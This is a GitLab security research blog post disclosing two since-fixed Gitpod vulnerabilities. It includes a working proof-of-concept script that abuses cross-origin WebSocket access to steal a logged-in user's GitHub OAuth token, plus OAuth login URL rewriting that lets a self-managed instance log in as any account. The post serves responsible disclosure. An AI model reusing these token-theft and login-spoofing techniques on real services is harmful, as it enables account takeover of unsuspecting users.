[{"data":1,"prerenderedAt":1611},["ShallowReactive",2],{"/blog/two-bugs-and-a-quick-fix-in-gitpod":3,"navigation-en-us":827,"banner-en-us":1253,"footer-en-us":1263,"blog-post-authors-en-us-Joern Schneeweisz":1508,"blog-related-posts-en-us-two-bugs-and-a-quick-fix-in-gitpod":1523,"blog-promotions-en-us":1548,"next-steps-en-us":1601},{"id":4,"title":5,"authors":6,"body":8,"category":807,"date":808,"description":809,"extension":810,"externalUrl":811,"faq":811,"featured":812,"heroImage":813,"meta":814,"navigation":815,"path":816,"seo":817,"slug":821,"stem":822,"tags":823,"template":825,"updatedDate":811,"__hash__":826},"blogPosts/en-us/blog/two-bugs-and-a-quick-fix-in-gitpod.md","A brief look at Gitpod, two bugs, and a quick fix",[7],"Joern Schneeweisz",{"type":9,"value":10,"toc":793},"minimark",[11,22,27,36,42,45,49,54,69,77,80,84,109,120,213,216,316,320,326,331,601,604,611,619,622,626,630,641,648,657,661,668,676,683,689,692,698,701,705,712,718,728,735,742,751,755,758,761,770,775,789],[12,13,14,15,21],"p",{},"While looking at GitLab's ",[16,17,20],"a",{"href":18,"rel":19},"https://docs.gitlab.com/integration/gitpod/",[],"Gitpod integration",", I came across two rather critical flaws in Gitpod itself. In this post, I'll cover the process of identifying the vulnerabilities and some background on Gitpod. The more critical issue was fixed and the fix was pushed to production by the Gitpod team in less than five hours from my initial report. Huge kudos to the Gitpod team for that quick turnaround.",[23,24,26],"h2",{"id":25},"what-is-gitpod","What is Gitpod?",[12,28,29,30,35],{},"First, let's see what Gitpod actually is -- taken straight from ",[16,31,34],{"href":32,"rel":33},"https://gitpod.io",[],"gitpod.io",":",[37,38,39],"blockquote",{},[12,40,41],{},"Spin up fresh, automated dev environments for each task, in the cloud, in seconds.",[12,43,44],{},"That quote sums it up really well. You can login to Gitpod with your GitLab, GitHub, or Bitbucket account and then use a pretty full-blown, web-based development environment to work on your code, run tests, or even spin up services and expose them from your Gitpod instance to the internet.",[23,46,48],{"id":47},"gitpod-vulnerability-1-cross-origin-websocket-access","Gitpod vulnerability #1: cross-origin WebSocket access",[50,51,53],"h3",{"id":52},"authentication-process","Authentication process",[12,55,56,57,61,62,65,66,68],{},"When logging into Gitpod via GitLab, we need to grant Gitpod the GitLab OAuth scopes ",[58,59,60],"code",{},"read_user"," and ",[58,63,64],{},"api",". The ",[58,67,64],{}," scope is needed to give Gitpod access to GitLab private repositories and push Git commits on behalf of the user.",[12,70,71,76],{},[72,73],"img",{"alt":74,"src":75},"Gitpod OAuth scopes","https://res.cloudinary.com/about-gitlab-com/image/upload/v1782398446/blog/Content%20Images/gitpod-oauth-scopes.png","\nGitpod authorization scope.",[12,78,79],{},"The fact that Gitpod holds an OAuth token with full API access to all three major Git hosting platforms sparked my interest, as this level of access makes it quite a high-value target. So I decided to look a bit at the inner workings and see how far I could get.",[50,81,83],{"id":82},"using-the-product","Using the product",[12,85,86,87,92,93,96,97,100,101,104,105,108],{},"When opening a Git-based project you are assigned a random workspace name ",[16,88,91],{"href":89,"rel":90},"https://github.com/gitpod-io/gitpod/blob/2b2702f31b6fc6f67c4b447c814dd6db6b4a433f/components/gitpod-protocol/src/util/generate-workspace-id.ts",[],"in the form of"," ",[58,94,95],{},"color-animal-XXXXXXXX"," like ",[58,98,99],{},"amaranth-wallaby-e7mg0z34.ws-eu03.gitpod.io",". Once the workspace is booted, you can perform all sorts of tasks, with one very interesting task being to expose application ports to the public. Exposed ports are made available at ",[58,102,103],{},"portnumber-color-animal-XXXXXXXX",", so exposing port 3000 for our example workspace will result in having the port accessible at ",[58,106,107],{},"https://3000-amaranth-wallaby-e7mg0z34.ws-eu03.gitpod.io",".",[12,110,111,112,115,116,119],{},"While using the web-based IDE under ",[58,113,114],{},"https://amaranth-wallaby-e7mg0z34.ws-eu03.gitpod.io",", I noticed the application opened a WebSocket connection to an API endpoint at ",[58,117,118],{},"https://gitpod.io/api/gitpod",". Within this WebSocket connection the IDE component of Gitpod from our workspace's subdomain was communicating with the main API. A sample request message when authenticated via GitHub would be:",[121,122,127],"pre",{"className":123,"code":124,"language":125,"meta":126,"style":126},"language-json shiki shiki-themes github-light","{\n  \"jsonrpc\": \"2.0\",\n  \"id\": 12,\n  \"method\": \"getToken\",\n  \"params\": {\n    \"host\": \"github.com\"\n  }\n}\n","json","",[58,128,129,138,155,168,181,190,201,207],{"__ignoreMap":126},[130,131,134],"span",{"class":132,"line":133},"line",1,[130,135,137],{"class":136},"sgsFI","{\n",[130,139,141,145,148,152],{"class":132,"line":140},2,[130,142,144],{"class":143},"sYu0t","  \"jsonrpc\"",[130,146,147],{"class":136},": ",[130,149,151],{"class":150},"sYBdl","\"2.0\"",[130,153,154],{"class":136},",\n",[130,156,158,161,163,166],{"class":132,"line":157},3,[130,159,160],{"class":143},"  \"id\"",[130,162,147],{"class":136},[130,164,165],{"class":143},"12",[130,167,154],{"class":136},[130,169,171,174,176,179],{"class":132,"line":170},4,[130,172,173],{"class":143},"  \"method\"",[130,175,147],{"class":136},[130,177,178],{"class":150},"\"getToken\"",[130,180,154],{"class":136},[130,182,184,187],{"class":132,"line":183},5,[130,185,186],{"class":143},"  \"params\"",[130,188,189],{"class":136},": {\n",[130,191,193,196,198],{"class":132,"line":192},6,[130,194,195],{"class":143},"    \"host\"",[130,197,147],{"class":136},[130,199,200],{"class":150},"\"github.com\"\n",[130,202,204],{"class":132,"line":203},7,[130,205,206],{"class":136},"  }\n",[130,208,210],{"class":132,"line":209},8,[130,211,212],{"class":136},"}\n",[12,214,215],{},"This request would obtain the logged-in user's access token for GitHub:",[121,217,219],{"className":123,"code":218,"language":125,"meta":126,"style":126},"{\n  \"jsonrpc\": \"2.0\",\n  \"id\": 12,\n  \"result\": {\n    \"value\": \"gho_justafaketokenhere\",\n    \"username\": \"oauth2\",\n    \"scopes\": [\n      \"user:email\"\n    ],\n    \"updateDate\": \"2021-04-14T09:06:46.578Z\"\n  }\n}\n",[58,220,221,225,235,245,252,264,276,284,289,295,306,311],{"__ignoreMap":126},[130,222,223],{"class":132,"line":133},[130,224,137],{"class":136},[130,226,227,229,231,233],{"class":132,"line":140},[130,228,144],{"class":143},[130,230,147],{"class":136},[130,232,151],{"class":150},[130,234,154],{"class":136},[130,236,237,239,241,243],{"class":132,"line":157},[130,238,160],{"class":143},[130,240,147],{"class":136},[130,242,165],{"class":143},[130,244,154],{"class":136},[130,246,247,250],{"class":132,"line":170},[130,248,249],{"class":143},"  \"result\"",[130,251,189],{"class":136},[130,253,254,257,259,262],{"class":132,"line":183},[130,255,256],{"class":143},"    \"value\"",[130,258,147],{"class":136},[130,260,261],{"class":150},"\"gho_justafaketokenhere\"",[130,263,154],{"class":136},[130,265,266,269,271,274],{"class":132,"line":192},[130,267,268],{"class":143},"    \"username\"",[130,270,147],{"class":136},[130,272,273],{"class":150},"\"oauth2\"",[130,275,154],{"class":136},[130,277,278,281],{"class":132,"line":203},[130,279,280],{"class":143},"    \"scopes\"",[130,282,283],{"class":136},": [\n",[130,285,286],{"class":132,"line":209},[130,287,288],{"class":150},"      \"user:email\"\n",[130,290,292],{"class":132,"line":291},9,[130,293,294],{"class":136},"    ],\n",[130,296,298,301,303],{"class":132,"line":297},10,[130,299,300],{"class":143},"    \"updateDate\"",[130,302,147],{"class":136},[130,304,305],{"class":150},"\"2021-04-14T09:06:46.578Z\"\n",[130,307,309],{"class":132,"line":308},11,[130,310,206],{"class":136},[130,312,314],{"class":132,"line":313},12,[130,315,212],{"class":136},[50,317,319],{"id":318},"cross-origin-websockets","Cross-origin WebSockets",[12,321,322,323,108],{},"After seeing the above messages being exchanged on the WebSocket across the different origins, the next thing I did was try this from a site where I control the content. Namely the exposed port! While it's not the exact workspace name it's still under the same subdomain: ",[58,324,325],{},".ws-eu03.gitpod.io",[12,327,328,329],{},"I simply served the following snippet via the exposed application port at ",[58,330,107],{},[121,332,336],{"className":333,"code":334,"language":335,"meta":126,"style":126},"language-html shiki shiki-themes github-light","\u003Cscript type=\"module\">\n  import { Octokit } from \"https://cdn.skypack.dev/@octokit/rest\";\n  var exampleSocket = new WebSocket(\"wss://gitpod.io/api/gitpod\")\n  exampleSocket.onmessage = function (event) {\n    console.log(event.data);\n    var x = JSON.parse(event.data);\n    var token = x.result.value;\n    console.log(x.result.value);\n    const octokit = new Octokit({\n    auth: token,\n  });\n octokit.users.getAuthenticated().then((user) => alert(\"hello \"+user.data.login));\n}\nexampleSocket.onopen = function (event) {\nexampleSocket.send('{\"jsonrpc\":\"2.0\",\"id\":29,\"method\":\"getToken\",\"params\":{\"host\":\"github.com\"}}')\n}\n\u003C/script>\n","html",[58,337,338,360,378,403,427,438,458,470,479,497,502,507,547,552,571,586,591],{"__ignoreMap":126},[130,339,340,343,347,351,354,357],{"class":132,"line":133},[130,341,342],{"class":136},"\u003C",[130,344,346],{"class":345},"shJU0","script",[130,348,350],{"class":349},"s7eDp"," type",[130,352,353],{"class":136},"=",[130,355,356],{"class":150},"\"module\"",[130,358,359],{"class":136},">\n",[130,361,362,366,369,372,375],{"class":132,"line":140},[130,363,365],{"class":364},"sD7c4","  import",[130,367,368],{"class":136}," { Octokit } ",[130,370,371],{"class":364},"from",[130,373,374],{"class":150}," \"https://cdn.skypack.dev/@octokit/rest\"",[130,376,377],{"class":136},";\n",[130,379,380,383,386,388,391,394,397,400],{"class":132,"line":157},[130,381,382],{"class":364},"  var",[130,384,385],{"class":136}," exampleSocket ",[130,387,353],{"class":364},[130,389,390],{"class":364}," new",[130,392,393],{"class":349}," WebSocket",[130,395,396],{"class":136},"(",[130,398,399],{"class":150},"\"wss://gitpod.io/api/gitpod\"",[130,401,402],{"class":136},")\n",[130,404,405,408,411,414,417,420,424],{"class":132,"line":170},[130,406,407],{"class":136},"  exampleSocket.",[130,409,410],{"class":349},"onmessage",[130,412,413],{"class":364}," =",[130,415,416],{"class":364}," function",[130,418,419],{"class":136}," (",[130,421,423],{"class":422},"sqxcx","event",[130,425,426],{"class":136},") {\n",[130,428,429,432,435],{"class":132,"line":183},[130,430,431],{"class":136},"    console.",[130,433,434],{"class":349},"log",[130,436,437],{"class":136},"(event.data);\n",[130,439,440,443,446,448,451,453,456],{"class":132,"line":192},[130,441,442],{"class":364},"    var",[130,444,445],{"class":136}," x ",[130,447,353],{"class":364},[130,449,450],{"class":143}," JSON",[130,452,108],{"class":136},[130,454,455],{"class":349},"parse",[130,457,437],{"class":136},[130,459,460,462,465,467],{"class":132,"line":203},[130,461,442],{"class":364},[130,463,464],{"class":136}," token ",[130,466,353],{"class":364},[130,468,469],{"class":136}," x.result.value;\n",[130,471,472,474,476],{"class":132,"line":209},[130,473,431],{"class":136},[130,475,434],{"class":349},[130,477,478],{"class":136},"(x.result.value);\n",[130,480,481,484,487,489,491,494],{"class":132,"line":291},[130,482,483],{"class":364},"    const",[130,485,486],{"class":143}," octokit",[130,488,413],{"class":364},[130,490,390],{"class":364},[130,492,493],{"class":349}," Octokit",[130,495,496],{"class":136},"({\n",[130,498,499],{"class":132,"line":297},[130,500,501],{"class":136},"    auth: token,\n",[130,503,504],{"class":132,"line":308},[130,505,506],{"class":136},"  });\n",[130,508,509,512,515,518,521,524,527,530,533,536,538,541,544],{"class":132,"line":313},[130,510,511],{"class":136}," octokit.users.",[130,513,514],{"class":349},"getAuthenticated",[130,516,517],{"class":136},"().",[130,519,520],{"class":349},"then",[130,522,523],{"class":136},"((",[130,525,526],{"class":422},"user",[130,528,529],{"class":136},") ",[130,531,532],{"class":364},"=>",[130,534,535],{"class":349}," alert",[130,537,396],{"class":136},[130,539,540],{"class":150},"\"hello \"",[130,542,543],{"class":364},"+",[130,545,546],{"class":136},"user.data.login));\n",[130,548,550],{"class":132,"line":549},13,[130,551,212],{"class":136},[130,553,555,558,561,563,565,567,569],{"class":132,"line":554},14,[130,556,557],{"class":136},"exampleSocket.",[130,559,560],{"class":349},"onopen",[130,562,413],{"class":364},[130,564,416],{"class":364},[130,566,419],{"class":136},[130,568,423],{"class":422},[130,570,426],{"class":136},[130,572,574,576,579,581,584],{"class":132,"line":573},15,[130,575,557],{"class":136},[130,577,578],{"class":349},"send",[130,580,396],{"class":136},[130,582,583],{"class":150},"'{\"jsonrpc\":\"2.0\",\"id\":29,\"method\":\"getToken\",\"params\":{\"host\":\"github.com\"}}'",[130,585,402],{"class":136},[130,587,589],{"class":132,"line":588},16,[130,590,212],{"class":136},[130,592,594,597,599],{"class":132,"line":593},17,[130,595,596],{"class":136},"\u003C/",[130,598,346],{"class":345},[130,600,359],{"class":136},[12,602,603],{},"And to my surprise this actually worked. It was possible to access the main WebSocket on behalf of the authenticated Gitpod user from a website I fully control.",[12,605,606,607,610],{},"The above script accesses the WebSocket while sending the user's cookies along with the request. This means we can authenticate the connection and ask for the user's GitHub access token. To verify everything works, the script authenticates against the GitHub API using the extracted access token to obtain the associated username and greets them with a ",[58,608,609],{},"hello \u003Cgithub-username>"," browser alert dialog.",[12,612,613,614,108],{},"This issue was fixed by Gitpod in their ",[16,615,618],{"href":616,"rel":617},"https://github.com/gitpod-io/gitpod/pull/4334/files#diff-06572a96a58dc510037d5efa622f9bec8519bc1beab13c9f251e97e657a9d4edR24",[],"May 2021 release",[12,620,621],{},"For a realistic attack, we'd need to lure a logged in Gitpod user to the app's exposed port to be able to fully impersonate them on GitLab/GitHub/BitBucket. While this is certainly quite a serious issue it still involves a lot of user interaction and social engineering to be successful.",[23,623,625],{"id":624},"gitpod-vulnerability-2-log-in-as-any-account","Gitpod vulnerability #2: log in as any account",[50,627,629],{"id":628},"custom-integrations","Custom integrations",[12,631,632,633,640],{},"While familiarizing myself a bit with the product, I came across the ",[16,634,637],{"href":635,"rel":636},"https://gitpod.io/integrations",[],[58,638,639],{},"Integrations"," settings.",[12,642,643,647],{},[72,644],{"alt":645,"src":646},"Gitpod Integrations","https://res.cloudinary.com/about-gitlab-com/image/upload/v1782398447/blog/Content%20Images/gitpod_integrations.png","\nGitpod integrations settings.",[12,649,650,651,656],{},"Custom integrations allow a user to gather an OAuth access token from self-managed GitLab and GitHub installations. This makes perfect sense since you might want to use Gitpod with your self-managed instance too. This setting caused a big 'what if?' moment for me. What if I could use a self-managed instance to log into Gitpod? On a self-managed instance I'm the king of my castle and can set arbitrary email addresses for any user. The idea here is to fool the login process and login as someone else. So I created an OAuth application as ",[16,652,655],{"href":653,"rel":654},"https://www.gitpod.io/docs/gitlab-integration#registering-a-self-hosted-gitlab-installation",[],"documented"," and registered it as an Integration within Gitpod.",[50,658,660],{"id":659},"my-first-attempt","My first attempt",[12,662,663,664,667],{},"If you choose to login with ",[58,665,666],{},"GitLab.com",", the regular login flow starts with a call to:",[121,669,674],{"className":670,"code":672,"language":673,"meta":126},[671],"language-text","https://gitpod.io/api/login?host=gitlab.com&returnTo=https%3A%2F%2Fgitpod.io%2Flogin-success\n","text",[58,675,672],{"__ignoreMap":126},[12,677,678,679,682],{},"The first attempt I made was to swap ",[58,680,681],{},"gitlab.com"," with the URL of a self-managed instance, just like this:",[121,684,687],{"className":685,"code":686,"language":673,"meta":126},[671],"https://gitpod.io/api/login?host=gl.thetanuki.io&returnTo=https%3A%2F%2Fgitpod.io%2Flogin-success\n",[58,688,686],{"__ignoreMap":126},[12,690,691],{},"It wasn't that easy, this try would promptly redirect to:",[121,693,696],{"className":694,"code":695,"language":673,"meta":126},[671],"https://gitpod.io/sorry#Login%20with%20gl.thetanuki.io%20is%20not%20allowed.\n",[58,697,695],{"__ignoreMap":126},[12,699,700],{},"Letting me know that I cannot log in with my self-managed instance.",[50,702,704],{"id":703},"my-second-attempt","My second attempt",[12,706,707,708,711],{},"The login request to ",[58,709,710],{},"https://gitpod.io/api/login?host=gitlab.com&returnTo=https%3A%2F%2Fgitpod.io%2Flogin-success"," originally redirected to:",[121,713,716],{"className":714,"code":715,"language":673,"meta":126},[671],"https://gitlab.com/oauth/authorize?response_type=code&redirect_uri=https%3A%2F%2Fgitpod.io%2Fauth%2Fgitlab%2Fcallback&scope=read_user%20api&client_id=bde00c0a8f15b7041aafabcc98210c73c5f2ca973cbd52c8a555fa08deebbcc8\n",[58,717,715],{"__ignoreMap":126},[12,719,720,721,61,724,727],{},"I rewrote that request to point to my self-managed instance, adapted the ",[58,722,723],{},"redirect_uri",[58,725,726],{},"client_id"," values to match those on that instance. After going through the login flow I could log into any account simply by setting the corresponding email address on the self-managed instance.",[12,729,730,731,734],{},"The result you can see in the screenshot below. Gitpod picked up the ",[58,732,733],{},"admin@example.com"," email address for my self-managed account, but really it could have been any email address I'd wanted to spoof:",[12,736,737,741],{},[72,738],{"alt":739,"src":740},"admin@example.com account","https://res.cloudinary.com/about-gitlab-com/image/upload/v1782397921/blog/Content%20Images/admin-example.png","\nAdmin example in Gitpod settings.",[12,743,744,745,750],{},"Gitpod was super quick to fix this issue, from the initial report it took them just about five hours to ship ",[16,746,749],{"href":747,"rel":748},"https://github.com/gitpod-io/gitpod/pull/3940",[],"a fix","!",[50,752,754],{"id":753},"conclusion","Conclusion",[12,756,757],{},"First of all huge thanks to the Gitpod team for a 10 out of 10 disclosure experience and prompt handling of the vulnerability reports.",[12,759,760],{},"Giving full API access to third parties is a common SaaS/cloud practice, however a leak somewhere could impact seemingly unrelated services.  In this case the attack wouldn't only have affected Gitpod alone but also the connected GitLab/GitHub/Bitbucket accounts.",[12,762,763],{},[764,765,766],"em",{},[767,768,769],"strong",{},"Security Research at GitLab",[12,771,772],{},[764,773,774],{},"Security research is one component of our broader security organization's efforts to enhance the security posture of our company, products, and client-facing services. See our Security Handbook to learn more.",[12,776,777,778,783,784],{},"Photo by ",[16,779,782],{"href":780,"rel":781},"https://www.pexels.com/@martabranco?utm_content=attributionCopyText&utm_medium=referral&utm_source=pexels",[],"Marta Branco"," on ",[16,785,788],{"href":786,"rel":787},"https://www.pexels.com/photo/closeup-photo-of-black-and-blue-keyboard-1194713/?utm_content=attributionCopyText&utm_medium=referral&utm_source=pexels",[],"Pexels",[790,791,792],"style",{},"html pre.shiki code .sgsFI, html code.shiki .sgsFI{--shiki-default:#24292E}html pre.shiki code .sYu0t, html code.shiki .sYu0t{--shiki-default:#005CC5}html pre.shiki code .sYBdl, html code.shiki .sYBdl{--shiki-default:#032F62}html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html pre.shiki code .shJU0, html code.shiki .shJU0{--shiki-default:#22863A}html pre.shiki code .s7eDp, html code.shiki .s7eDp{--shiki-default:#6F42C1}html pre.shiki code .sD7c4, html code.shiki .sD7c4{--shiki-default:#D73A49}html pre.shiki code .sqxcx, html code.shiki .sqxcx{--shiki-default:#E36209}",{"title":126,"searchDepth":140,"depth":140,"links":794},[795,796,801],{"id":25,"depth":140,"text":26},{"id":47,"depth":140,"text":48,"children":797},[798,799,800],{"id":52,"depth":157,"text":53},{"id":82,"depth":157,"text":83},{"id":318,"depth":157,"text":319},{"id":624,"depth":140,"text":625,"children":802},[803,804,805,806],{"id":628,"depth":157,"text":629},{"id":659,"depth":157,"text":660},{"id":703,"depth":157,"text":704},{"id":753,"depth":157,"text":754},"security","2021-07-08","Our security researcher takes a look at Gitpod and finds some access tokens under the carpet.","md",null,false,"https://res.cloudinary.com/about-gitlab-com/image/upload/v1749668524/Blog/Hero%20Images/closeup-photo-of-black-and-blue-keyboard-1194713.jpg",{},true,"/en-us/blog/two-bugs-and-a-quick-fix-in-gitpod",{"title":5,"description":809,"ogTitle":5,"ogDescription":809,"noIndex":812,"ogImage":813,"ogUrl":818,"ogSiteName":819,"ogType":820,"canonicalUrls":818},"https://about.gitlab.com/blog/two-bugs-and-a-quick-fix-in-gitpod","https://about.gitlab.com","article","two-bugs-and-a-quick-fix-in-gitpod","en-us/blog/two-bugs-and-a-quick-fix-in-gitpod",[807,824],"security research","BlogPost","IgAUIjIPMYuvLTD7vjxnx82iNfRPQH4XX93GfTkaNl0",{"logo":828,"freeTrial":833,"sales":838,"login":843,"items":848,"search":1174,"minimal":1204,"duo":1223,"switchNav":1232,"pricingDeployment":1243},{"config":829},{"href":830,"dataGaName":831,"dataGaLocation":832},"/","gitlab logo","header",{"text":834,"config":835},"Get free trial",{"href":836,"dataGaName":837,"dataGaLocation":832},"https://gitlab.com/-/trial_registrations/new?glm_source=about.gitlab.com&glm_content=default-saas-trial/","free trial",{"text":839,"config":840},"Request a demo",{"href":841,"dataGaName":842,"dataGaLocation":832},"/sales/?contact-topic=request-demo","sales",{"text":844,"config":845},"Sign in",{"href":846,"dataGaName":847,"dataGaLocation":832},"https://gitlab.com/users/sign_in/","sign in",[849,878,978,983,1096,1152],{"text":850,"config":851,"menu":853},"Platform",{"dataNavLevelOne":852},"platform",{"type":854,"columns":855},"cards",[856,862,870],{"title":850,"description":857,"link":858},"The intelligent orchestration platform for DevSecOps",{"text":859,"config":860},"Explore our Platform",{"href":861,"dataGaName":852,"dataGaLocation":832},"/platform/",{"title":863,"description":864,"link":865},"GitLab Duo Agent Platform","Agentic AI for the entire software lifecycle",{"text":866,"config":867},"Meet GitLab Duo",{"href":868,"dataGaName":869,"dataGaLocation":832},"/gitlab-duo-agent-platform/","gitlab duo agent platform",{"title":871,"description":872,"link":873},"Why GitLab","See the top reasons enterprises choose GitLab",{"text":874,"config":875},"Learn more",{"href":876,"dataGaName":877,"dataGaLocation":832},"/why-gitlab/","why gitlab",{"text":879,"left":815,"config":880,"menu":882},"Product",{"dataNavLevelOne":881},"solutions",{"type":883,"link":884,"columns":888,"feature":957},"lists",{"text":885,"config":886},"View all Solutions",{"href":887,"dataGaName":881,"dataGaLocation":832},"/solutions/",[889,913,936],{"title":890,"description":891,"link":892,"items":897},"Automation","CI/CD and automation to accelerate deployment",{"config":893},{"icon":894,"href":895,"dataGaName":896,"dataGaLocation":832},"AutomatedCodeAlt","/solutions/delivery-automation/","automated software delivery",[898,902,905,909],{"text":899,"config":900},"CI/CD",{"href":901,"dataGaLocation":832,"dataGaName":899},"/solutions/continuous-integration/",{"text":863,"config":903},{"href":868,"dataGaLocation":832,"dataGaName":904},"gitlab duo agent platform - product menu",{"text":906,"config":907},"Source Code Management",{"href":908,"dataGaLocation":832,"dataGaName":906},"/solutions/source-code-management/",{"text":910,"config":911},"Automated Software Delivery",{"href":895,"dataGaLocation":832,"dataGaName":912},"Automated software delivery",{"title":914,"description":915,"link":916,"items":921},"Security","Deliver code faster without compromising security",{"config":917},{"href":918,"dataGaName":919,"dataGaLocation":832,"icon":920},"/solutions/application-security-testing/","security and compliance","ShieldCheckLight",[922,926,931],{"text":923,"config":924},"Application Security Testing",{"href":918,"dataGaName":925,"dataGaLocation":832},"Application security testing",{"text":927,"config":928},"Software Supply Chain Security",{"href":929,"dataGaLocation":832,"dataGaName":930},"/solutions/supply-chain/","Software supply chain security",{"text":932,"config":933},"Software Compliance",{"href":934,"dataGaName":935,"dataGaLocation":832},"/solutions/software-compliance/","software compliance",{"title":937,"link":938,"items":943},"Measurement",{"config":939},{"icon":940,"href":941,"dataGaName":942,"dataGaLocation":832},"DigitalTransformation","/solutions/visibility-measurement/","visibility and measurement",[944,948,952],{"text":945,"config":946},"Visibility & Measurement",{"href":941,"dataGaLocation":832,"dataGaName":947},"Visibility and Measurement",{"text":949,"config":950},"Value Stream Management",{"href":951,"dataGaLocation":832,"dataGaName":949},"/solutions/value-stream-management/",{"text":953,"config":954},"Analytics & Insights",{"href":955,"dataGaLocation":832,"dataGaName":956},"/solutions/analytics-and-insights/","Analytics and insights",{"title":958,"type":883,"items":959},"GitLab for",[960,966,972],{"text":961,"config":962},"Enterprise",{"icon":963,"href":964,"dataGaLocation":832,"dataGaName":965},"Building","/enterprise/","enterprise",{"text":967,"config":968},"Small Business",{"icon":969,"href":970,"dataGaLocation":832,"dataGaName":971},"Work","/small-business/","small business",{"text":973,"config":974},"Public Sector",{"icon":975,"href":976,"dataGaLocation":832,"dataGaName":977},"Organization","/solutions/public-sector/","public sector",{"text":979,"config":980},"Pricing",{"href":981,"dataGaName":982,"dataGaLocation":832,"dataNavLevelOne":982},"/pricing/","pricing",{"text":984,"config":985,"menu":987},"Resources",{"dataNavLevelOne":986},"resources",{"type":883,"link":988,"columns":992,"feature":1085},{"text":989,"config":990},"View all resources",{"href":991,"dataGaName":986,"dataGaLocation":832},"/resources/",[993,1025,1052],{"title":994,"items":995},"Getting started",[996,1001,1006,1011,1016,1021],{"text":997,"config":998},"Install",{"href":999,"dataGaName":1000,"dataGaLocation":832},"/install/","install",{"text":1002,"config":1003},"Quick start guides",{"href":1004,"dataGaName":1005,"dataGaLocation":832},"/get-started/","quick setup checklists",{"text":1007,"config":1008},"Learn",{"href":1009,"dataGaLocation":832,"dataGaName":1010},"https://university.gitlab.com/","learn",{"text":1012,"config":1013},"Product documentation",{"href":1014,"dataGaName":1015,"dataGaLocation":832},"https://docs.gitlab.com/","product documentation",{"text":1017,"config":1018},"Best practice videos",{"href":1019,"dataGaName":1020,"dataGaLocation":832},"/getting-started-videos/","best practice videos",{"text":639,"config":1022},{"href":1023,"dataGaName":1024,"dataGaLocation":832},"/integrations/","integrations",{"title":1026,"items":1027},"Discover",[1028,1033,1038,1043,1047],{"text":1029,"config":1030},"Customer success stories",{"href":1031,"dataGaName":1032,"dataGaLocation":832},"/customers/","customer success stories",{"text":1034,"config":1035},"Blog",{"href":1036,"dataGaName":1037,"dataGaLocation":832},"/blog/","blog",{"text":1039,"config":1040},"Demo Hub",{"href":1041,"dataGaName":1042,"dataGaLocation":832},"/demo-hub/","demo hub",{"text":1044,"config":1045},"The Source",{"href":1046,"dataGaName":1037,"dataGaLocation":832},"/the-source/",{"text":1048,"config":1049},"Remote",{"href":1050,"dataGaName":1051,"dataGaLocation":832},"https://handbook.gitlab.com/handbook/company/culture/all-remote/","remote",{"title":1053,"items":1054},"Connect",[1055,1060,1065,1070,1075,1080],{"text":1056,"config":1057},"GitLab Services",{"href":1058,"dataGaName":1059,"dataGaLocation":832},"/services/","services",{"text":1061,"config":1062},"Contribute",{"href":1063,"dataGaName":1064,"dataGaLocation":832},"https://contributors.gitlab.com","contribute",{"text":1066,"config":1067},"Community",{"href":1068,"dataGaName":1069,"dataGaLocation":832},"/community/","community",{"text":1071,"config":1072},"Forum",{"href":1073,"dataGaName":1074,"dataGaLocation":832},"https://forum.gitlab.com/","forum",{"text":1076,"config":1077},"Events",{"href":1078,"dataGaName":1079,"dataGaLocation":832},"/events/","events",{"text":1081,"config":1082},"Partners",{"href":1083,"dataGaName":1084,"dataGaLocation":832},"/partners/","partners",{"config":1086,"title":1089,"text":1090,"link":1091},{"background":1087,"textColor":1088},"url('https://res.cloudinary.com/about-gitlab-com/image/upload/v1777322348/qpq8yrgn8knii57omj0c.png')","#000","What’s new in GitLab","Stay updated with our latest features and improvements.",{"text":1092,"config":1093},"Read the latest",{"href":1094,"dataGaName":1095,"dataGaLocation":832},"/whats-new/","whats new",{"text":1097,"config":1098,"menu":1100},"Company",{"dataNavLevelOne":1099},"company",{"type":883,"columns":1101},[1102],{"items":1103},[1104,1109,1115,1117,1122,1127,1132,1137,1142,1147],{"text":1105,"config":1106},"About",{"href":1107,"dataGaName":1108,"dataGaLocation":832},"/company/","about",{"text":1110,"config":1111,"footerGa":1114},"Jobs",{"href":1112,"dataGaName":1113,"dataGaLocation":832},"/jobs/","jobs",{"dataGaName":1113},{"text":1076,"config":1116},{"href":1078,"dataGaName":1079,"dataGaLocation":832},{"text":1118,"config":1119},"Leadership",{"href":1120,"dataGaName":1121,"dataGaLocation":832},"/company/team/e-group/","leadership",{"text":1123,"config":1124},"Handbook",{"href":1125,"dataGaName":1126,"dataGaLocation":832},"https://handbook.gitlab.com/","handbook",{"text":1128,"config":1129},"Investor relations",{"href":1130,"dataGaName":1131,"dataGaLocation":832},"https://ir.gitlab.com/overview/default.aspx","investor relations",{"text":1133,"config":1134},"Trust Center",{"href":1135,"dataGaName":1136,"dataGaLocation":832},"/security/","trust center",{"text":1138,"config":1139},"AI Transparency Center",{"href":1140,"dataGaName":1141,"dataGaLocation":832},"/ai-transparency-center/","ai transparency center",{"text":1143,"config":1144},"Newsletter",{"href":1145,"dataGaName":1146,"dataGaLocation":832},"/company/contact/#contact-forms","newsletter",{"text":1148,"config":1149},"Press",{"href":1150,"dataGaName":1151,"dataGaLocation":832},"/press/","press",{"text":1153,"config":1154,"menu":1155},"Contact us",{"dataNavLevelOne":1099},{"type":883,"columns":1156},[1157],{"items":1158},[1159,1164,1169],{"text":1160,"config":1161},"Talk to sales",{"href":1162,"dataGaName":1163,"dataGaLocation":832},"/sales/","talk to sales",{"text":1165,"config":1166},"Support portal",{"href":1167,"dataGaName":1168,"dataGaLocation":832},"https://support.gitlab.com/hc/en-us","support portal",{"text":1170,"config":1171},"Customer portal",{"href":1172,"dataGaName":1173,"dataGaLocation":832},"https://customers.gitlab.com/customers/sign_in/","customer portal",{"close":1175,"login":1176,"suggestions":1182},"Close",{"text":1177,"link":1178},"To search repositories and projects, login to",{"text":681,"config":1179},{"href":846,"dataGaName":1180,"dataGaLocation":1181},"search login","search",{"text":1183,"default":1184},"Suggestions",[1185,1187,1191,1193,1197,1201],{"text":863,"config":1186},{"href":868,"dataGaName":863,"dataGaLocation":1181},{"text":1188,"config":1189},"Code Suggestions (AI)",{"href":1190,"dataGaName":1188,"dataGaLocation":1181},"/solutions/code-suggestions/",{"text":899,"config":1192},{"href":901,"dataGaName":899,"dataGaLocation":1181},{"text":1194,"config":1195},"GitLab on 